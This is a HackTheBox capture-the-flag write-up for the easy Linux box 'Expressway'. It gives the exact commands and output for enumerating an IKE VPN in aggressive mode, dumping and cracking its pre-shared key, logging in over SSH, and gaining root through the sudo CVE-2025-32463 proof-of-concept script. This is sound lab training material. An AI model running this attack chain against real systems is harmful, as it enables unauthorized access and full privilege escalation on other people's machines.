Expressway – HackTheBox Link to heading
- OS: Linux
- Difficulty: Easy
- Platform: HackTheBox
Summary Link to heading
“Expressway” is an Easy box from HackTheBox platform. The victim machine is running a Internet Key Exchange (IKE) service. Thanks to a misconfiguration in this service, we are allowed to extract credentials for this service that are also useful for SSH service. Once in, we can see that sudo version is outdated and is vulnerable to CVE-2025-32463. This vulnerability allows to elevate privileged in the system and easily impersonate root.
User Link to heading
We start with a quick Nmap scan looking for open TCP ports:
❯ sudo nmap -sS -p- --open --min-rate=5000 -n -Pn -vvv 10.129.190.74
We only find 1 port open: 22 SSH. Applying some recognition scans over this only port we get:
❯ sudo nmap -sVC -p22 10.129.190.74
Starting Nmap 7.95 ( https://nmap.org ) at 2025-09-20 17:50 -03
Nmap scan report for 10.129.190.74
Host is up (0.29s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 10.0p2 Debian 8 (protocol 2.0)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.77 seconds
We can then look for open UDP ports with Nmap, where we get:
❯ sudo nmap -sU --top-ports 100 --open 10.129.190.74
Starting Nmap 7.95 ( https://nmap.org ) at 2025-09-20 17:53 -03
Nmap scan report for 10.129.190.74
Host is up (0.28s latency).
Not shown: 95 closed udp ports (port-unreach)
PORT STATE SERVICE
68/udp open|filtered dhcpc
69/udp open|filtered tftp
500/udp open isakmp
4500/udp open|filtered nat-t-ike
32771/udp open|filtered sometimes-rpc6
Nmap done: 1 IP address (1 host up) scanned in 111.99 seconds
We can see an Internet Key Exchange (IKE) service running on port 500.
IKE, or Internet Key Exchange, is a protocol used to automatically set up secure communication channels, particularly for IPsec VPNs. It functions as the initial “handshake” between two devices, authenticating them, agreeing on security parameters like encryption methods and keys, and establishing a secure tunnel for subsequent data transfer. Essentially, IKE manages the process of exchanging cryptographic keys and setting up the necessary security associations (SAs) to ensure the data exchanged is confidential, integral, and authentic.Applying some recognition scans over this port we get:
❯ sudo nmap -sUVC -p500 10.129.190.74
Starting Nmap 7.95 ( https://nmap.org ) at 2025-09-20 17:57 -03
Nmap scan report for 10.129.190.74
Host is up (0.27s latency).
PORT STATE SERVICE VERSION
500/udp open isakmp?
| ike-version:
| attributes:
| XAUTH
|_ Dead Peer Detection v1.0
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 133.26 seconds
But does not provide much information.
However, this blog provides more information about pentesting IKE service. There, they mention a tool called ike-scan which can be obtained at its Github repository. However, we can also attempt to install it using apt install:
sudo apt update -y && sudo apt install ike-scan -y
Now, to correctly use ike-scan, we find this another blog that also explains how to extract information from IKE service as well. There, they suggest to run the command:
ike-scan -M -A <target-ip>
Where -M specifies “main mode scanning” and -A specifies “aggressive mode”.
As the blog specifies, if “aggressive mode” is enabled, the VPN may leak the group name and be vulnerable to credential brute-force attacks.
Running it we get:
❯ ike-scan -M -A 10.129.190.74
Starting ike-scan 1.9.6 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
10.129.190.74 Aggressive Mode Handshake returned
HDR=(CKY-R=44f674a34584fdd0)
SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800)
KeyExchange(128 bytes)
Nonce(32 bytes)
ID(Type=ID_USER_FQDN, Value=ike@expressway.htb)
VID=09002689dfd6b712 (XAUTH)
VID=afcad71368a1f1c96b8696fc77570100 (Dead Peer Detection v1.0)
Hash(20 bytes)
Ending ike-scan 1.9.6: 1 hosts scanned in 0.306 seconds (3.27 hosts/sec). 1 returned handshake; 0 returned notify
We can see the response Aggressive Mode Handshake returned. We can also see at ID field the value ike@expressway.htb. Therefore, ike might be a potential user.
Continuing with the blog, they also suggest a command to extract hashes:
❯ ike-scan -A --pskcrack 10.129.190.74
Starting ike-scan 1.9.6 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
10.129.190.74 Aggressive Mode Handshake returned HDR=(CKY-R=3925813ea86f1ba7) SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800) KeyExchange(128 bytes) Nonce(32 bytes) ID(Type=ID_USER_FQDN, Value=ike@expressway.htb) VID=09002689dfd6b712 (XAUTH) VID=afcad71368a1f1c96b8696fc77570100 (Dead Peer Detection v1.0) Hash(20 bytes)
IKE PSK parameters (g_xr:g_xi:cky_r:cky_i:sai_b:idir_b:ni_b:nr_b:hash_r):
d7dea145886a64157bcea81201db6e357124f0cc43007f24cede8b93d04bbe9835eeff29531ab65e7923e8ba006638bbaad01f06f5246e1c4f32ceff6d1425c15bc1f84eccda2249b45576c52103fb156ae090f69ba6d19e72674c22d6f2f31ba1b9473a80e33068195de44db9d2e8325b29576108cd7a59fe4e89397a9c58b3:84825ec0748782e3c898e9f69bf8b233b3a433dd03f8906b40a7c8d36a74ea6f97cecc9c9f30626ff25126ec5755b107bc71dabc35a0330bdf58d1ffc4b57cadcea73f61161165208ec22e365994af151bc00a45c48edf85c59a802d5cfb47a11f56f0948d1994ec28a113d61b6809dfe2d3656406a3b30406083972c0948eca:3925813ea86f1ba7:7d39e52c6b3e64b4:00000001000000010000009801010004030000240101000080010005800200028003000180040002800b0001000c000400007080030000240201000080010005800200018003000180040002800b0001000c000400007080030000240301000080010001800200028003000180040002800b0001000c000400007080000000240401000080010001800200018003000180040002800b0001000c000400007080:03000000696b6540657870726573737761792e687462:73866765000a5f6dc0f149f55d50617608e7eed2:bb4deb493422896dbac2bf7847e0455237709bd03ce0af9930336562f79cbd5c:2f7c31efdf9c20e0b7840f6bed1fa28cde9caf02
Ending ike-scan 1.9.6: 1 hosts scanned in 0.279 seconds (3.58 hosts/sec). 1 returned handshake; 0 returned notify
We got a big text what seems to be a hash.
Then, save this hash into a file:
❯ echo d7dea145886a64157bcea81201db6e357124f0cc43007f24cede8b93d04bbe9835eeff29531ab65e7923e8ba006638bbaad01f06f5246e1c4f32ceff6d1425c15bc1f84eccda2249b45576c52103fb156ae090f69ba6d19e72674c22d6f2f31ba1b9473a80e33068195de44db9d2e8325b29576108cd7a59fe4e89397a9c58b3:84825ec0748782e3c898e9f69bf8b233b3a433dd03f8906b40a7c8d36a74ea6f97cecc9c9f30626ff25126ec5755b107bc71dabc35a0330bdf58d1ffc4b57cadcea73f61161165208ec22e365994af151bc00a45c48edf85c59a802d5cfb47a11f56f0948d1994ec28a113d61b6809dfe2d3656406a3b30406083972c0948eca:3925813ea86f1ba7:7d39e52c6b3e64b4:00000001000000010000009801010004030000240101000080010005800200028003000180040002800b0001000c000400007080030000240201000080010005800200018003000180040002800b0001000c000400007080030000240301000080010001800200028003000180040002800b0001000c000400007080000000240401000080010001800200018003000180040002800b0001000c000400007080:03000000696b6540657870726573737761792e687462:73866765000a5f6dc0f149f55d50617608e7eed2:bb4deb493422896dbac2bf7847e0455237709bd03ce0af9930336562f79cbd5c:2f7c31efdf9c20e0b7840f6bed1fa28cde9caf02 > ike_hash
And, as the blog suggests, use psk-crack to crack this hash, passing rockyou.txt dictionary as the password dictionary:
❯ psk-crack -d /usr/share/wordlists/rockyou.txt ike_hash
Starting psk-crack [ike-scan 1.9.6] (http://www.nta-monitor.com/tools/ike-scan/)
Running in dictionary cracking mode
key "freakingrockstarontheroad" matches SHA1 hash 2f7c31efdf9c20e0b7840f6bed1fa28cde9caf02
Ending psk-crack: 8045040 iterations in 12.596 seconds (638715.04 iterations/sec)
We got the key freakingrockstarontheroad.
Finally, we can check if this password/key works for the previously found user ike with SSH with NetExec:
❯ nxc ssh 10.129.190.74 -u ike -p 'freakingrockstarontheroad'
SSH 10.129.190.74 22 10.129.190.74 [*] SSH-2.0-OpenSSH_10.0p2 Debian-8
SSH 10.129.190.74 22 10.129.190.74 [+] ike:freakingrockstarontheroad Linux - Shell access!
It worked.
Connect as this user using SSH service:
❯ sshpass -p 'freakingrockstarontheroad' ssh -o stricthostkeychecking=no ike@10.129.190.74
<SNIP>
Last login: Sat Sep 20 22:28:27 2025 from 10.10.16.80
ike@expressway:~$
We can grab the user flag.
Root Link to heading
If we check sudo version we get:
ike@expressway:~$ sudo -V
Sudo version 1.9.17
Sudoers policy plugin version 1.9.17
Sudoers file grammar version 50
Sudoers I/O plugin version 1.9.17
Sudoers audit plugin version 1.9.17
Some time ago, there was an advisory indicating that a sudo version was vulnerable to a privilege escalation. Versions prior to 1.9.17p1 allows the exploitation of a privilege escalation vulnerability labeled as CVE-2025-32463. Searching for PocS for this vulnerability we find this Github repository. The same repository provides some commands to check if the target machine is vulnerable:
ike@expressway:~$ sudo -R woot woot
sudo: woot: No such file or directory
Since we got the message sudo: woot: No such file or directory, the target is vulnerable.
We clone the repository into our attacker machine and pass the malicious .sh file to the victim machine using scp (since we have SSH access):
❯ git clone https://github.com/pr0v3rbs/CVE-2025-32463_chwoot.git -q
❯ cd CVE-2025-32463_chwoot
❯ sshpass -p 'freakingrockstarontheroad' scp ./sudo-chwoot.sh ike@10.129.190.74:/tmp/sudo-chwoot.sh
Then, in the victim machine, assign execution permissions to the exploit and execute it:
ike@expressway:~$ chmod +x /tmp/sudo-chwoot.sh
ike@expressway:~$ /tmp/sudo-chwoot.sh
woot!
root@expressway:/# whoami
root
GG. We can grab the root flag at /root directory.
~Happy Hacking